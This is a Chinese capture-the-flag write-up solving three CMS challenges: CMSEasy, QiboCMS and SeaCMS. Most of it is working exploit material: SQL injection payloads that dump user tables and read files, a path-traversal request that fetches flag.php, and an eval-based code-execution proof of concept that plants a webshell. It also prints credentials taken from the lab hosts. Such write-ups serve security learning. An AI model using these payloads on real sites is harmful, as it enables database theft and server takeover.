百度杯CMS

识别CMS方法

在线识别

http://www.yunsee.cn/

http://whatweb.bugscaner.com/

工具识别

• CMSmap
• WhatWeb

关键信息

• github
• 备案号
• 水印logo

CMS漏洞查找

• 乌云镜像
• seebug
• 漏洞时代

YeserCMS

识别CMS

点开一篇文章，在文章下面评论框中发现CMSEASY的水印，认定为CMSEASY

CMS漏洞

用乌云镜像查到一堆漏洞，也只能找看起来容易利用的来尝试，最终使用WooYun-2015-137013，这个报错注入漏洞成功利用

利用漏洞

// 乌云给出的利用方式，payload本身经过两次url编码，但本题进行测验时，发现并不需要进行url编码也可利用成功

POST /celive/live/header.php

xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx%2527%252C%2528UpdateXML%25281%252CCONCAT%25280x5b%252Cmid%2528%2528SELECT%252f%252a%252a%252fGROUP_CONCAT%2528concat%2528username%252C%2527%257C%2527%252Cpassword%2529%2529%2520from%2520cmseasy_user%2529%252C1%252C32%2529%252C0x5d%2529%252C1%2529%2529%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%2529--%2520</q></xjxquery>



// 两次url解码后，可看出是一个报错注入

POST /celive/live/header.php

xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password)) from cmseasy_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>

// 数据库名

xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(schema_name)) from information_schema.schemata),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>

// 表名，发现前缀为Yesercms_

xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(table_name)) from information_schema.tables where table_schema='Yeser'),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>

// 猜测用户表为Yesercms_user

xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password)) from yesercms_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>

// 32位长度不够继续第二次

xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password)) from yesercms_user),20,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>

// 得到用户名以及密码hash，cmd5解密

admin::ff512d4240cbbdeafada404677ccbe61

admin::Yeser231

getshell失败

通过漏洞库找到的getshell方法都没用，也没办法用load_file注入读出网站目录下的flag.php

在管理界面中模板->当前模板编辑中可看到类似文件读取的功能，抓包发现，可能为文件包含

POST /index.php?case=template&act=fetch&admin_dir=admin&site=default HTTP/1.1
Host: 0ffa855eb139493c98d79cb36dc98fb21d3584a2d80242da.game.ichunqiu.com
Proxy-Connection: keep-alive
Content-Length: 29
Accept: application/json, text/javascript, */*
Origin: http://0ffa855eb139493c98d79cb36dc98fb21d3584a2d80242da.game.ichunqiu.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://0ffa855eb139493c98d79cb36dc98fb21d3584a2d80242da.game.ichunqiu.com/index.php?case=template&act=edit&admin_dir=admin&site=default
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,da;q=0.8
Cookie: PHPSESSID=93d011f88a4d727ff86158d96926ef75;passinfo=%E5%85%8D%E8%B4%B9%E7%89%88+%3Ca+href%3D%22http%3A%2F%2Fwww.cmseasy.cn%2Fservice_1.html%22+target%3D%22_blank%22%3E%3Cfont+color%3D%22green%22%3E%28%E8%B4%AD%E4%B9%B0%E6%8E%88%E6%9D%83%29%3C%2Ffont%3E%3C%2Fa%3E; login_username=admin; login_password=a94f8d9844c391a79ae9db9aa41d2c44; style=skin2

&id=#archive_d_list_page_html

尝试更改id，获得flag

&id=#../../flag.php

再见CMS

识别CMS

• 通过备案号：京ICP备050453号，百度可知为齐博cms
• 通过bugscaner扫描为：php168
• 后来知道php168就是齐博cms的前身（无奈…）

CMS漏洞

用乌云镜像查到一堆漏洞，发现这个CMS特别爱留后门，但尝试一堆无果，最终使用WooYun-2014-80259这个注入漏洞

利用漏洞

管理员的密码哈希cmd5查不到，直接利用load_file读出flag.php文件

POST /member/userinfo.php?job=edit&step=2 HTTP/1.1
Host: e33c7daf395f4333ad03ce19153b2085b4030edb27934599.game.ichunqiu.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,da;q=0.8
Cookie: passport=3%09xuanxuan%09UlZVW1ANBlUDU1cFCQAPAg4CUFkFCAYEV14CBgEGDVU%3Dfdf97d74d9; USR=dvy0cwef%0934%091521126941%09http%3A%2F%2Fe33c7daf395f4333ad03ce19153b2085b4030edb27934599.game.ichunqiu.com%2F
Content-Type: application/x-www-form-urlencoded
Content-Length: 159

truename=xxxx%0000&Limitword[000]=&email=xuanxuan@162.com&provinceid=,address=(select load_file(0x2F7661722F7777772F68746D6C2F666C61672E706870)) where uid=3%23

Test

识别CMS

直接看标识为：海洋CMS

CMS漏洞

• 漏洞时代：海洋CMS V6.28代码执行0day
• freebuf：漏洞预警：海洋CMS（SEACMS）0day漏洞预警，不过出题的时候还没有这篇文章

利用漏洞

POC:/search.php?searchtype=5&tid=&area=eval($_POST[1]) 菜刀链接,密码为1

翻到/var/www/html/data/common.inc.php这个文件，拿到数据库信息，菜刀链接数据库拿flag

<?php
//数据库连接信息
$cfg_dbhost = '127.0.0.1';
$cfg_dbname = 'seacms';
$cfg_dbuser = 'sea_user';
$cfg_dbpwd = '46e06533407e';
$cfg_dbprefix = 'sea_';
$cfg_db_language = 'utf8';
?>